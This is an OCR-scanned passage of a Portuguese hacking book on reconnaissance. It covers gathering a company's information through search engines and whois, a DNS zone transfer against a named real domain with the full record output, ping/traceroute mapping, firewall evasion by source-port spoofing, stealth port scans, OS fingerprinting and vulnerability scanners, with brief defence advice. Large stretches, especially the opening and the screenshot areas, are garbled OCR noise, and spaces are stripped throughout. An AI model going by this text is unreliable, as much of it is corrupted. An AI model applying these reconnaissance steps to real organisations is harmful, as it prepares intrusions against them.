-'-""",'.n,.,'"
A
A---_~I,,"Id.m...-- i
GOCtO
.
'
.
te'"jl<enriqueCesarUlbrich I-GoogIo] I;
"""0 GJ_-",w",Q ,,~- ,
-,::r::l.~.l~ 'I,~--,, ,~-~""'_.,.,_.-
Geoa."'",com."''''''''''\>oU'''',20000,{'mo,,'"",.~~"
.,H_C_U_1J3I25aOOO"".,...,"H-
C_U""",",03I24>20001127,01-
-g"""""""'_,,"'_3i,maOOOf3iOl."".Em~d'"P.""_~I"
G"""""","_.deblan~<>Ortua""",'materia"""""""'.00-.
_lh~d,~__,"""""''''oL."""M""."",,,."'OM,H_e-
u"""'"DATE,"'~'1200'00,11',SUBJEC7REm."'.'- """""'RdoL..,.
''',9'OC',_oomm._''''''31200'"I1)I_84,I.,,,._.""",s,m"'-
{um,_.""do~woo","mW""" {
Iisl5.""""".oroJcjoormailismt>dlenJsmJ03-Fe"""""{)d.[,..,,'"',,,"""riM{
From--"_"."",,"'Moo''''314,''',112003From,-- "d___'"
{"_C_U-I Dato Moc''''3"",,,.2003_-
"'.'m=""--'h!ili!!!
ISOLUTION{S10wcrnooectionwi1hsmbdJentlWiI,dows10"'..me,.[T..",,",UM"'...w]
,"om""'" ,].8",,'1,m,.,"'''''" C-
U""","--"_"",,,."'Moo'"314,""11OMT2003,...
_~m",,,,,,,""'~'__I.200>-f,,,~,,'OOO3".hlm'.".~.", ,,,
[Mo',u""oo'""".~m".=j
R"H"''',<3oo"",
,,_''''''00"_C_U_--,,",
w_.R~,,_"""'wbyD.,.,Enomtrodo0- '"
,"'_.""",'dabi~'_'-JI<,"~"OO'ldoorn,,."w.._200101Irn.,oooo2.htm'. ""Em~'h<"~
- ~.
Experimenteprocurarpeloseunome,e
pelonomedesuaempresaparaveroque
vocêdisseeoquedizemdevocê.Procure
tambémpelosnomesdeseusempregados,for-
necedores,clientes.Vocêveráqueépossível
angariardiversasinformaçõesdessaforma.
Todososmecanismosdebuscapossuem
refmamentosnaprocura.Épossívelprocu-
rarporformatodearquivo,data,ocorrên-
cia,partesdeURLsoumesmopáginasque
apontamparaumaURLemespecial.
Porexemplo,usamosoGooglepara
procurarsitesqueapontamparaa
Conectiva(www.conectiva.com.br).
-'-~--,-
---~.._,-
Ga
og
'"le",~=",~=:I"-'_",-0_-_""--
-_o- ,, ,,~..",,-..---
C_""""M"'''''''''''
","",""""',"""..
--'O~'-,_'_'_"
'~"-~~-.'_""Hm._'-
C","""do"'Cd"'M,,,,i.~'
0_"'''''''0_00''_'__'''''--'
--~-'~_W_~~-"~"--"
._-~",.",""""","."",,"~-~,..
"''''"",,''''''_'M~._''.~''''-"'
~~~cc1~::':":~~.~,,-
"'WM'''''''''~
2281
Ataque,defesaecontra-ataque:Observação
Oresultadoseriaeste:
Observeocomandonaáreadebusca
doGoogle.O"1ink:"funcionamuitobem
noAltaVtSta(www:altavista.com)eno
AllTheWeb(www:a1ltheweb.com),que
tambémpossuemdiversasopçõesde
buscaavançada.

Universidade3°Ano
Atétu,Brutus?
Masoperigopodeestaremcasa!Vocêjáolhouseusitepessoalouodesua
empresa?Emumagarimpagembem-feita(ajudado,pasme,pelomecanismode
buscaqueopessoaldaWebcolocouparaauxiliarointernauta!!!),oatacante
podepossivelmenteangariaralgumasdessasvaliosasinformações:
~Tecnologia:váàpáginadeTIdoseusite.Querosermicodecircoseo
pessoaldaáreanãocolocouumalistacompletacomastecnologiasemuso.É
possívelque,atéporquestõescontratuais,suaempresasejaobrigadaacolocar
umseloPoweredBynosite.Mesmonãosendo,amaioriadossitespossui.
Empresasefuncionáriosnormalmentesãoorgulhososdassoluçõestecnológicas
queajudamaimplementareficamtentadosacolocarinformações
comp1etíssimasnossites.Hackersadoramisso! .
~Relacionamentos:muitasempresasdivulgam(intencionalmenteounão)
informaçõessobreseusparceiros,fornecedores,clienteseconsultores.Muitos
atécolocamdadossobreaconcorrência!Alguémpodeestarusandoasinfor-
maçõesdoSEUsiteparaatacaraempresaparaaqualvocêtrabalha.Mesmo
funcionárioscostumamcolocarinformaçõesrestritasemseussitespessoais.
~Informaçõescorporativas:cultura,linguagem,funcionáriosimportantes,
premiações,operário-padrão,f11iais,nomes,números,ramaisee-mailsdefunci-
onários...Esseéotipodeinformaçãopossíveldeobterapenaspesquisandoo
sitedaempresa.Alémdefacilitarataquesremotos,épossívelpersonificaro
"funcionário-padrão"daempresaparapenetraremsuasinstalaçõestísicas.Uma
vezdentro,odesempre:engenhariasocial,sniffers,backdoors,roubodedocu-
mentosemídias...
~Notícias:cuidadocomoscomunicadosdeimprensaenotaspublicadas
comonotíciaemseusite.Informaçõesimportantespodemvazarnasentreli-
nhas.Quem,comooshackers,estáhabituadoaenfurnar-seemdepósitosde
lixoecaçambasdedetritosparaangariarfragmentosdeinformação(sujosde
Ketchupepapelhigiênicousado)nãoteránenhumadificuldadeempegarda-
dosprontinhosorganizadosnaáreadenotíciasdoseusiteecruzá-Iosentresi.
Queméessecara?
Quemtemumdomínio,tevederegistrá-Ioemalgumlugar.NoBrasil,quem
cuidadosregistrosdedomínioséaFAPESP(registro.br).Quandosefazore-
gistro,asinformaçõessãoguardadasnumbancodedadoschamadowhois(em
português,"quemé").Cadadomínio-raiztemseuprópriobancodedadosde
whois.Porexemplo,osdomínios.com,.mile.edu(todosnorte-americanos)
têmseusprópriosbancosdedadoswhois.
Verificarobancodedadoswhoisémuitofácil.VáaoRegistro.bredigiteo
domínionocampocorrespondente.
12291
Ataque,defesaecontra-ataque:Observação

IUniversidadeH4CK3R I
CliquenobotãoPESQUlSAR.A
janelaWhoisvaimostrarosda-
dosderegistroformatadosnes-
sepadrão.Emnossoexemplo(o
whoisdedigeratLcom.br),temos:
Bem-vindoaoRegisuo.br
Reg;..rod.do";."'.p'"".tem.'.oB,as'
~~;'~l;';;I,~I~...J~..Jc!!~lÇ
1
IPES<IU'5ARI
v."""",."".,.,a","""
,-,.,.,,,-.
I"",",,,,,I
N_. -
""""'''I>w~'''''''"""'-"'«;'''';0"~=,.-.,,.
,,"'.""R"''''.00-,.""...-"""~1I2OO3.C""""'''''
~''',"-,""",,''.
""a,","~"~~""'_d..",""<'<ONS.'-"00l12000l
C"""'."',,w""'_~"M
"""'"'N~M""".",,,."..,.~_"'R,,_.,,,
W""'"'M""""M""""',.R.,.".""D.mi"""R.m"".oo""..,.
30""'_",CNP./ICP'.Cio"""'''''~.,"_~"M
.R"........-
.v...
,ro..''',,,
.p,~=,."",-
.T,"""00R"'"
,,,,,,,ight","'re."
,""'"'~"proot'dodf~inf~Üoo''"1'''''
,""...,.,..j>ff~'in.M""",inf_Üoo.-,~
,"''''''''''''in.._""""""""""..,,,,oo.
,,,,,,,,,,,,.,.,...,,,,,,,,..,,,,,,,
,onlyf~,,,,,.,"",,,,""
,2003-<)4-<181<),,,,21 (BRr..",00)
~br
_n'.DI""'TI.""."
MÜ"",,,DigmÜC_i,,,,,,,.T"ool",i."da
doc_'.001.1<)7'''/OOO1-36
"."."""",""_",",,",,i
.n"""""..."""".wbo."'.12AndM
.n"""""014".{)Q1-''''P",J.-"
,.1"'_,(D11)3217-2600[)
""',,...,.,"""
"...i."""
""mi",U\Nl3
"",,"',."""
_ioo,D''',1151.""""'.""."
SónabasededadosWhoistemosara-
zãosocialdaempresa,onomecompleto
dosresponsáveisporela,endereços,tele-
fones,e-mails...Jáéumaexcelentefontede
dadosgrátis.Masatenteparaestedetalhe:
Noooossaaaa!!!Jásabemosquaissãoosdoisser-
vidoresdeDNSqueessedomíniousa.Apenascom
osdadosquegarimpamosnaWeb,jásomoscapa-
zesdefazerdiversasmalvadezascomodomínio.
servidorDNS:NS1.LQCAWEB.Co.!.BR
statusDNS:06/04/2003AA
últimoAA:06/04/2003
servidorDNS:NS2.LQCAWEB.Co.!.BR
statusDNS:06/04/2003 AA
últimoAA:
06/04/2003
criado: 16/01/1998 #82624
alterado: llj03/2003
status: publicado
Signyour nameacrossmyheart
Todasessasinformaçõesquevimosatéaquinestecapítuloforamobtidasexclusiva-
menteusandoseunavegadorWeb.Nenhumaferramentaespecialfoinecessária,e
vocênãoincorreuemnenhumcrime,poispesquisouemáreasebancosdedados
públicos.Mesmoassim,arrecadouinformaçõesperigosíssimasquepodemcolocar
emrisco,sebem(mal?)usadas,todaumacorporação.MasnemsóaWebnosdáoserviço.
AgoraquesabemososendereçosdetodososDNSsdodomínioquequere-
mosatacar,vamosdarumaolhadaneles.Nãovamosdiscutirosfundamentos
técnicossobreDNS.Seoleitornãosoubercomofuncionaumsistemade
DomainNameServer,sugerimosoexcelentelivroDNSeBIND,dePaulAlbitze
CricketLiu(EditoraO'Reilly).
Assimcomonosservidoresdewhois,oDNSpossuiinformaçõesque,obriga-
toriamente,devemestarabertasedisponíveisaograndepúblico.Comunica-
çãopore-mail,sitesWebeservidoresdeFTPsãotrêsexemplosdeserviços
que,mesmovivendosemoDNS,dependemdeleparadaraosusuáriosuma
formamaisfácildeguardarendereçosnaInternet.
1230I
Ataque,defesaecontra-ataque:Observaçãor

Universidade3°Ano
Háferramentasdelinhadecomando,tantonoWindowscomonoUnix,que
podemrecuperarinformaçõesvaliosassobreDNSparaoshackers.Adicional-
mente,oNessuséumexemplodescannerdevulnerabilidadeque,entreoutras
coisas,recuperainformaçõesdeservidoresDNS.
OgrandeproblemadatecnologiadeDNSsãoastransferênciasdezonaou
zonetransfers.QuandoumprovedorouempresapõenoarumsistemaDNS,
normalmentecolocamaisdeumservidor(posicionadoemlocalidadesdiferen-
tes)paraatenderaosprogramasquedependemdele.UmdelesseráoDNS
primário,osoutrosserãosecundáriosouescravos.Ozonetransferéumproce-
dimentocriadoparatransferirdadosentretodososDNSsdaqueledomínioou
zona(zonaéumconjuntodeváriosdomínios,ouantes,deváriossubdomínios
nummesmodomínio).
Oqueocorreéqueapenashostsautorizadosdeveriampoderfazertransferên-
ciasdedomínios.SemeuDNSprimárioé204.200.100.99emeusecundárioé
204.200.200.250,apenaso250poderiasolicitarzonetransfersdo99evice-
versa.Observamos,entretanto,quequaseatotalidadedeDNSsaoredordaTerra
permitezonetransferssolicitadosapartirdequalquernódaGrandeRede.
Umexemploprático.Emumaestaçãocomlinux,usaremosocomandodigoEsse
comandopodeserencontradotambémemalgunsUnix.Abraumterminaledigite:
[email protected] digerati.com.brAXFR
Asintaxeésimples.OprimeiroargumentoéonomedoservidorDNS(poderiaser
tambémonúmeroIP).Osegundoargumentoéodomínioquesequerpesquisareo
terceiro(AXFR)indicaquequeremosfazerumzonetransfer.Asaídadocomandoé:
;«» DiG9.2.1 «» @NS1.1ocaweb.com.br digerati.com.br AXFR
;;global options: printcmd
digerati.com.br.
3600
admin.1ocaweb.com.br. 8
digerati.com.br. O IN
digerati.com.br. O IN
digerati.com.br. O IN
digerati.com.br. O IN
digerati.com.br. O IN
ftp.digerati.com.br. O
smtp.digerati.com.br. O
pop.digerati.com.br. O
mail.digerati.com.br. O
www.digerati.com.br. O
wap.digerati.com.br. O
sqlserver.digerati.com.br. O
webmail.digerati.com.br. O
smtp-gw.digerati.com.br. O
digerati.com.br.
3600
admin.1ocaweb.com.br. 83600
;;Query time: 881msec
;;SERVER: 200.246.179.123#53 (NS1.1ocaweb.com.br)
;;WHEN: TueApr 812:28:502003
;;XFR size:17records
IN
3600
NS
NS
NS
A
MX
IN
IN
IN
IN
IN
IN
IN
IN
IN
IN
60086400
SOA hm23.
600 864003600
NS1.1ocaweb.com.br.
NS2.1ocaweb.com.br.
NS3.1ocaweb.com.br.
200.246.179.102
10smtp-gw.digerati.com.br.
A 200.246.179.102
A 200.182.98.136
A 200.182.98.136
A 200.182.98.136
A 200.246.179.102
A 200.246.179.102
A 200.246.179.82
CNAME pop.digerati.com.br.
A 200.182.98.155
SOA hm23.
3600
12311
]Ataque,defesaecontra-ataque:Observação

IUniversidadeH4CK3RI
Creeedooo!UmsimplescomandinhonosdissequeoservidordeSMTPda
empresaestáem200.182.98.155,equeosservidoresWebeFTPdividema
mesmamáquinaem200.246.178.102.Nãoestamosconsiderando,porenquanto,
interfacesderedecommúltiplosIPs,mas,dequalquerforma,arealidadepode
serumpouquinhodiferentedaquefoimostradanalista.Mesmoassim,éum
excelentepontodepartidaparafazermaispesquisa,começarminiataques
(lembradeles?12341234...)eelaborarseuplanodeação.
Outrosexemplosdeferramentasparafazerzonetransferssãoojácitado
Nessus(comversõesparaUnixeWindows),ohost,disponívelnamaioriados
Unix,eoveteranonslookup,presentetantoemUnixcomonoWindows.Note
queonslookupparaLinuxnãofazzonetransfers!
Defesaecontra-ataque
Infelizmente,nãohámuitocomosedefenderdeinformaçõesobtidaspor
meiodebancosdedadoswhois.Asinformaçõesdesseserviçodevemestar
disponíveisuniversalmente,portantonãoháoquefazer.Casosrecentesde
defacements(comoodositedaDigeratiEditorial)forampossíveisusandoas
informaçõesobtidasporwhoise,depois,comumpoucodeengenhariasocial,
obtidasassenhasparaalteraçãodoDNS.Éumtípicocasodefalhahumana.O
problemanãoforamasinformaçõesdewhois,masassenhasfracasea
vulnerabilidadesocial.
JáoszonetransfersdeservidoresDNSpodem,sim,serevitados.Crieregras
emseuservidorpararestringirzonetransfersapenasentreservidoresDNSdo
seudomínio,bemcomodosroot-DNS-servers.
Comonãohánadadeilegalnasatividadesdoblackhatatéaqui,poisas
informaçõesobtidassãotodaspúblicas,nãohácomolançarumcontra-ataque.
Mesmoporque,devidoaotráfegogigantesco,rastrearacessosaservidoresde
whoiseDNSétarefaimpossível.
Mas,SIM!Épossíveltomarmedidaspreventivas(alémderestringirozone
transfer-issoémuitoimportante!)paraevitarqueinformaçõesdesnecessári-
asvazemparaaInternet.Entreelas:
~Façaumafaxinaemcasa!Vasculheseusiteeretiretudooquepodedar,
indevidamente,informaçõesconfidenciaisourestritasquepossibilitemumataque.
~Criepolíticassobreoquepodeserpublicadonositeeveiculadopor
e-mail.Criepunições(infelizmente,necessárias)casoalgumfuncionárioponha
emriscoaempresadivulgandooquenãodeveria.Enadadecolocarbandeiri-
nhascom"PoweredbyWindowsNT4"ou"RunningLinux2.2".
12321
Ataque,defesaecontra-ataque:Observação[

Universidade3°Ano
Façacampanhaspreventivas,alertandoosusuáriosdee-mailsparaoperigo
deenviardadosinternosdacompanhiaparafora.Pegueaquelapesquisaque
vocêfeznaWebcomosnomesoue-mailsdeseusfuncionáriosemonteuma
apresentaçãoparailustrarsuascampanhas.
12331
]Ataque.defesaecontra-ataque:Observação

Ataque,defesae
contra-ataque:
usca
Capítulo12
PedI;edar-se-vos-á;busca;'eachareis;bate;'
eabrir-se-vos-á.Porque,todooquepede,
recebe;e,oquebusca,acha. "
(Mateus,VII:7-111

IUniversidadeH4CK3R I
Assimcomoosmilitares,queusamosserviçosdeinteligênciaparaelaborar
relatóriossobreoalvoesódepoisvãoacampoparaobservá-Io,nóstambém
tivemosdeangariartodasaquelasinformações,elaborarplanosdeaçãoefa-
zerumroteirodeataque.Nestanovafase,faremosoqueosmilitareschamam
dereconhecimento:conferirosdadosobtidos,preenchereventuaislacunas,
corrigirdistorçõeseobterdadosdeáreasantesinacessíveis.Lembre-se:depois
devoltardasbuscas,realimentaremosnossoroteirocomasinformaçõesobti-
das.Nuncafujado1-2-1-3-1-4-1-5-1-6-1!
CartografiaaplicadaàInternet
Chegouahoradedescobrircomoéarededenossavítima.Ohackerusará
ferramentasdescanning,comoasquevimosemVulnerabilidadesIe11,para
testararedeedescobrir,primeiro,comoelaémontada(topologias,sistemas
defirewalIeIDS,servidoreseestações
-incluindoaíseussistemasoperacionais)
efazerummapaomaisdetalhadopossíveldoque,paraele,aindasão"mares
nuncadantesnavegados".
Vamoscomeçarcomumdiagramasimples:
RedePrivada
~~
192.168.3.0192.168.4.0
200.xxx.10.20
SMTPtPOP
200.xxx.20.30
ServiçosDiversos
200.xxx.20.10
SQLServer
2361
Ataque,defesaecontra-ataque:Busca[

Universidade3°Ano
Emnossodiagrama,ohackeraindanãoconheceoscomputadoresdenossa
rede,representadosemcoresmaecida.Nodecorrerdestecapítulo,àmedida
queeleforidentificandoasdiferentesmáquinasemnossarede,asestaçõesvão
ficandonítidas.Posteriormente,computadores"ownados"(ouseja,jáinvadidos
pelohacker)serãorepresentadospeloícone"doente".
Observequeháumf1ltrodepacoteseumproxy,àguisadefirewall.Essa
configuraçãocriaachamadaZonaDesmilitarizadaouDMZ.Nela,osservido-
rescomacessopúblicopermitido(Web,FTP,SMTP...)ficam"protegidos"pelo
f11trodepacotes,quebloqueia(oudeveriabloquear)qualquercomunicação
vindadeforaequenãosejadestinadaaserviçosespecíficosdosservidores.
Mesmoconexõesaservidoresdeveriamserbloqueadas:umaconexãonaporta
80(HTTP)sóépermitidaseoseudestinoforrealmenteoservidorWebenão
odeSMTP.Conexõesdeforaemdireçãoàredeinterna,nempensar...
Oproxy,queficanabordaentrearedeinternaeoDMZ,trazumacamada
adicionaldesegurançaeevitaqueasestaçõesinternasconectem-seàInternet.
Docontrário,elasconectam-seaoproxyeele(apenasele)"fala"comaInternet.
Comesseartifício,paraquemvêdefora,aredeinternaécomposta,apenase
tão-somente,peloproxy.Opróprioproxypodeserinvadidoeessasrestrições
contornadas,masissoéconversaparamaisadiante.
Varre,varre,vassourinha...'
TodoslembramdoNmapedoNessus?Elessãoótimos.Praticamentetudoo
queprecisamosparadescobrircoisasnasredesdosoutrospodeserconsegui-
docomessasduasferramentas.Mas,parafmsdidáticos,vamosusarduasdas
ferramentasmaisbásicasepresentesemtodosossistemasoperacionaisque
possuamalgumsuporteaTCP1IP.Essasferramentassãoopingeotraceroute
(tracertnoWindows).
Opingéumprogramaminúsculoquefazumaúnicacoisanavida:mandaum
pacoteICMPEchoRequest(vejaemRedes11)paraverificarseumdeterminadoIP
existeouseamáquinaque
possuiaqueleIPestáon-line.
Assim,podemostestartodaa
faixadeIPsdesignadapara
aquelaempresaouorganiza-
ção,parasaberquaisdessesIPs
representammáquinasligadas
diretamentenaInternet.
UmavezcomalistadeIPs
"vivos"namão,ohackerfazum
desenhoparecidocomeste:
aO
~o
8
TodososIps
200.xxx.l0.n~
~
(j)
8
200.xxx.20.10
1jingledacampanhapresidencialdejânioQuadros,em1956.
12371
]Ataque,defesaecontra-ataque:Busca

IUniversidadeH4CK3R I
CadaumdoscírculosrepresentaumdosIPs.Voltandoaonossodiagramade
redes,avisãoqueoatacantetemdenossasmáquinaséesta:
~
::::;
"
.~
200.xxx.l0.2
Proxy+Gateway
[]Hackernãovê
.Hackervê~
::::;
iP
::::;
lI'
.~.~
200.xxx.l0.20200.xxx.20.30
SMTP+PDP ServiçosDiversos~
::::;
"
.~..
200.xxx.20.10
SQlServer
Agora,otraceroute/tracertéutilizadoemcadaumdosIPsdescritos.Asinta-
xeébemsimples:traceroute-nIP.QUE.QUEREMOS.VERIFICAR.Asaídadeum
tracerouteseparececomesta:
1
2
3
4
5
6
7
192.168.1.162 0.524ma0.235ma0.204ma
200.204.171.155 1.084ma1.040ma1.028ma
200.204.174.122 11.322ma18.636ma272.474ma
200.207.199.121 602.530ma513.476ma524.081ma
200.205.255.219 559.810ma531.438ma610.651ma
200.205.255.212 817.968ma596.748ma576.567ma
200.205.254.134 527.308ma523.359ma548.114ma
...(continua)
oparâmetro-néapenasparaevitarqueotracerouteprocurepornomesDNS
dosIPsmostrados.Ohackerdeve,diligentemente,anotar(ougravareimprimir)
todasassaídasdotracerouteparatodososIPsqueeledescobriucomopingoSe
tentarseguiressalistadetrásparafrente,vaiperceberquemuitasdasmáquinas
estãoencadeadas.Emnossoexemplo,vemosqueasaídadotraceroutedohost
200.xxx.1.1Onosdizqueamáquinaanterioréa200.xxx.1.1.Ora,issoquer
dizerqueasmáquinasestãoligadas!Emnossodiagrama:
~38I
Ataque,defesaecontra-ataque:Buscar

8
TodososIPs
200.xxx.l0.n
Universidade3°Ano
200.xxx.20.10
Cruzandoosdadosdetodosostraceroutes,ohackerteráaseguintevisão:
200.xxx.l0.20
SMTP+POP
200.xxx.20.30
ServiçosDiversos 200.xxx.20.10
SGLServer
12391
]Ataque,defesaecontra-ataque:Busca

IUniversidadeH4CK3R I
Argh!Masisso dátrabalho!
Quermoleza?Vásentarnopudim!Aliás,existemalgumasferramentasque
fornecemopudimpravocê.UmadelaséoLANSurveyor,daempresaLAN
Software(www.neon.comlTutorials/LStourMAP.html).Mas,emqualquersitua-
ção,amelhorferramenta(disponívelapenasparaUnix)éoCheops
(www.marko.net/cheops).Alémdeterumainterfacebonitaefuncional,o
Cheopsfazoserviçosujopravocê.Estescreenshot(retiradodositeoficial)é
melhorquequalquerexemploquepudéssemospreparar:
phY,is
20~.230.721!p
201.23{Í,72.$
Comovocêpodeperceber,oCheopsautomatizaosprocedimentoscompinge
traceroute(quetêmdeestarpresentesnosistema)eaindausatécnicasdefmger
printing(queveremosadiante)paraadivinharosistemaoperacionaldecadanó.
Procurandoportasabertas
EmambososcapítulosdeVulnerabilidades,vimosalgumasferramentaspara
verificarseháserviços"escutando"emportasTCPouUDP.Naquelemomento,
vimosoportscanningcomoumprocessoisolado.Agoraquesabemosondese
inserenodesenvolvimentodenossasbuscas,podemosdarmaisatençãoaele.
Emboraexistamcentenasdeportscannersporaí,indiscutivelmenteoNmap
éoquetrazumamelhorrelaçãocusto!benefício:égratuito,possuiumbom
conjuntodetesteseestáemdesenvolvimentocontínuo.
12401
Ataque,defesaecontra-ataque:Busca[

Universidade3°Ano
ParasaberasopçõesdoNmap,vejaapáginademanual(mannrnap)ouo
HelpdaversãoWindows.Asversõescomfrontends(WindowseUnix)possu-
em,nopaineldecontrole,chavesparaquasetodosostesteseumabarrade
statusnaqualémostradocomoficariaalinhadecomando.Nãovamosentrar
emdetalhesdeutilizaçãodoNmapaqui.Emvezdisso,vamosfalarsobreas
formasdiferentesde"torcer"ohandshakeTCP.
OcomandoNmaprodadosemargumentosfazumaconexãocompletana
portatestada,oquequerdizerquetodoohandshakeTCPérespeitado.Obvia-
mente,essescanéextremamenteruidosoefacilmentedetectável.
Escolhendoasportasdeorigem
Algumasredespermitemquecertasportasdeorigempossamoriginarcone-
xõesdeforadaInternet.Comovimos,emRedes11,osf1ltrosdepacotesque
funcionamcomofirewallsbarramconexõesvindasdaInternetbaseadasem
regras.Entreasregrasmaiscomunsemanjadasestáaquelaquebarratodasas
portasnãoprivilegiadas(ouseja,maioresque1023)vindasdeforaparaden-
trodarede.Comisso,oadministradorpensaqueestáprotegendosuaredede
conexõesoriginadasdamáquinadoshackers.
Elepodeatépensar,maspensaerrado!Nadaimpedequeoshackersmani-
pulemasportasdeorigemdeseuspacotesTCPeUDPenviadosaofirewall
davítima,fazendo-opensarquesãorespostasválidasarequisiçõesvindasde
dentrodarede.
Oexemploclássicoéaporta80.Seoblackhatcombinarautilizaçãode80
comosuaportadeorigem(osportscansdignosdessenomepermitemisso)com
oflagACKacionado,obobalhãodofirewallvaipensarqueesteéumpacote
válido-eodeixaráentrar.
Firewall
(filtrodepacotes)
18
~
12411
]Ataque,defesaecontra-ataque:Busca

IUniversidadeH40~3R I
Outrasportasquepodemserdeinteresse:20(respostadeFTP),21(requisi-
çãodeFTP),25(respostadeSMTP),53UDPe53TCP(requisiçãoerespostade
DNS)e666/667TCPeUDP(respostadoservidordeDoomeQuake -tenha
certeza,seuadministradordeixouestasabertasparajogarànoite).Vejabem:
estamosfalandodeportasdeorigem.Asportasdedestinoserãoescaneadas.
TalvezumestudodaRFC1700(www.ietf.org/rfc.hyml)sejarevelador.
Paraencontrarquaisportasofirewallestádeixandopassaralémdessas
óbvias,podemosusarpadrõesdefmgerprinting(queveremosmaisàfrente),
combinadoscomastécnicasdetracerouteeping,paradescobrircomofunci-
onamasregrasdosfirewalls.Nãohámuitossoftwaresbonsquefazemisso,
masumédignodenota.ExisteexclusivamenteparaUnixesechamaFirewaIk.
Disponívelemwww.packetfactory.net/firewalk/.possuiumadocumentação
que,senãoégrande,pelomenosébemcompleta.ComoFirewalk,ficamuito
fácildeterminarasportasabertasdeumfiltrodepacotesfuncionandocomo
firewalle,depois,aplicarportscansdirecionadosàsmáquinasinternaspassan-
doporessasportasnãofiltradas.
Varrendosobotapete
Háváriasformasdeusarportscannersparaverificarasportasabertas.Jáconhecemos
ohandshakecompletoeaconexãoporACK(vistosemRedesll).Abaixo,segueumalista
completadaspossibilidadesusandoosflagsdoTcp,e,dequebra,umscanUDP:
TCPConneetSean:scanfacilmentedetectável,executaostrêshandshakes
básicos(SYN,SYN/ACKeACK).Osistemarealmentecompletaaconexãoen-
treoserviçosendoescaneadoeoscanner
-e,paraisso,informaçõescomple-
tassobreoaplicativo-cliente(oscanner)sãopassadasaoservidor(oserviço).
TCPSYNSean:Conhecidocomohalf-openscanning,devidoàconexãototalTCP
duranteaoperação.Dessaforma,eleevitaqueologdaoperaçãofiquenosistema.
Normalmente,oprogramaenviaumpacoteSYNparaaportaalvo.Seérecebido
umSYN/ACKdoalvo,oprogramadeduzqueaportaestánomododeescuta;caso
sejaumRST/ACK,significaqueaportanãoestáativanaquelemomento.
UPDSean:Trata-sedeumdosprocessosmaislentoseimprecisosdescanning,
poisdependedefatoresdeutilizaçãodaredeederecursosdesistema.Oscanner
enviaumpacoteUDPparaaportaalvo:searespostaforICMPportunreachab1e,a
portaencontra-sefechada;casocontrário,oscannerdeduzqueaportaestáaberta.
TCPNullSean:Nestecaso,oscandesativatodososflagseaguardadoalvo
umRST,queidentificaaportacomofechada.Senadaresponder,aportapode
estaraberta(masnãoécerteza).
TCPFINSean:OscannerenviapacotesFINparaaportaalvoeesperao
retornodeumRST,identificandoasportasfechadas.Senadaresponder,apor-
tapodeestaraberta(novamente,semnenhumacerteza).
TCPXmasSean:OscannerenviapacotesFIN,URGePSHparaaportaalvo
eesperaoretornodeumRTSparaportasfechadas.Nenhumarespostaindica
possívelportaaberta.
2421
Ataque.defesaecontra-ataque:Busca[

Universidade3°Ano
ImpressãodigitaLnaWeb
Identificarosistemaoperacionalqueestárodandononóespecificadoépri-
mordialparaexplorarasvulnerabilidadespossivelmentepresentes.Atécnica
usadanadeterminaçãodoSOdoshostschama-sefmgerprinting(ou,coletade
impressãodigital).
Épossívelenviar,seqüencialmente,todosostestesTCPeUDPdescritospara
asportasdeumnó.Dependendodamaneiracomoresponde,épossívelsaber
qualsistemaoperacionalestárodandonaquelehost.
OCheopseoNmapfazemissomagistralmente.Procureadocumentaçãodeam-
bosparasabercomousá-losecomointerpretarosresultados.Parasabermaissobre
comoftrncionaofingerprinting,procureporfingerprintingosdeterminationou
portepudpfingerprintingemseumecanismodebuscasfavorito.
Temmais?
Hádiversastécnicasdeportscan.Relacionartodasnãoseriapossívelemum
livrode350páginascomoeste.Masrelacionamosabaixomaisalgunstipos,
cujadescriçãopodeserfacilmenteencontradanaInternet.
~FTPBounee:usaumacaracterísticaantigadosservidoresFTp'queéa
possibilidadedeutilizarumservidorFTPcomointermediárioafimdeenviar
umarquivoparaumaterceiramáquina.Comoépossívelcontrolaremqual
portaseráfeitaaconexão,pode-se,manualmente,varrertodasasportasda
terceiramáquina(avítima)atéconseguirconexão.Navítima,estaráregistrado
oIPdoservidorFTPenãodohacker.TambémchamadodeFTPforwarding.
~FalhasdeRCP:jáfalamossobreRemoteProcedureCallsemRedesI.
Todosossistemasoperacionaispossuemalgumaimplementaçãodeserviços
RPC,epraticamentetodostêmalgumaquerespondaincorretamenteauma
conexão,revelandoqueaceitaaconexão(apesardenãonecessariamenteser
vulnerável).ProcureporRPCSeaneRPCExploit.
Procurandobrechas
Jáfalamosalgumacoisasobrefurosdesegurançanosdoiscapítulossobre
vulnerabilidades.Oqueumscannerdevulnerabilidadefaz,normalmente,étestar
cadaumdosserviçosoferecidosdeacordocompadrõespreestabelecidos.Casoo
sistemarespondatambémdeacordocompadrõesreconhecidamentepertencen-
tesàsversõesfalhas,oscanneroreportacomo"bugado"e,portanto,possivelmen-
tevulnerável.Todososfmgerprints(tantodesolicitaçãoquantoderesposta)estão
guardadosembancosdedadoscujaatualizaçãoéconstanteecontínua.
Havíamospreparado,paraestaseção,umtextomuitoextenso,didáticoefacil-
mentedigerívelsobrediversosscannersdevulnerabilidades.Mas,olhandopara
aquilotudo,pensamos:"estamosnegandoaoleitoraoportunidadedeaprender".
Defato,sedéssemosopeixe,estaríamoscondenando-oaserumscriptkiddie
paraorestodavida.Seoensinássemosapescar,aindaassimnãohaveriaopor-
12431
]Ataque,defesaecontra-ataque:Busca

IUniversidadeH4CK3R I
tunidadeparapensar,raciocinarevercomoascoisasfuncionam.Portanto,em
vezdedaropeixeouensiná-Ioapescar,decidimosapenasmostrar-lheolago.
Asvarasdepescaestãolá.Ponhaacucaparafuncionar,amãonamassae
aprendaumpoucosozinho!
Osendereçosdasduas"varasdepesca"maisfamosasencontram-seabaixo.
Estude-ascompletamente,lendotodaasuadocumentaçãoeprocurandomais
informaçõesnaInternet.Seficaremdúvida,peçaajuda!Hámuitosgruposde
discussãosobreredescompessoasdispostasaajudar-vocêpodeencontraro
endereçodealgunsnoscapítulossobreredes.Sevocêprocurarbem,veráque
podelereaprendermuitacoisaantesmesmodecolocarosdedosnoteclado
paraescarafuncharnosburacosdealguém(semtrocadilho,porfavor!).
~Nessus:www.nessus.org
~Gherkin:www.altmode.com/gherkin/
Adicionalmente,buscasnaInternetvãolhemostrardiversasferramentas(li-
vresounão)descannersdevulnerabilidade.VocêverácoisascomoCOPS,SAINT,
NetSaint,SARA,VLAD,NetSonar...Brinqueprimeirocomosdoissugeridos.
Depoisquesecansardeles,baixe(oucompre,seforocaso)osoutrosedivirta-
semaisumpouquinho.Hackerismoéisso:aprendafazendo.Pense!
Defesaecontra-ataque
Paradefender-sedehackers(oukiddies)quevarremsuaredeotempotodo,
énecessárioobedeceraalgumasregrasfundamentais:
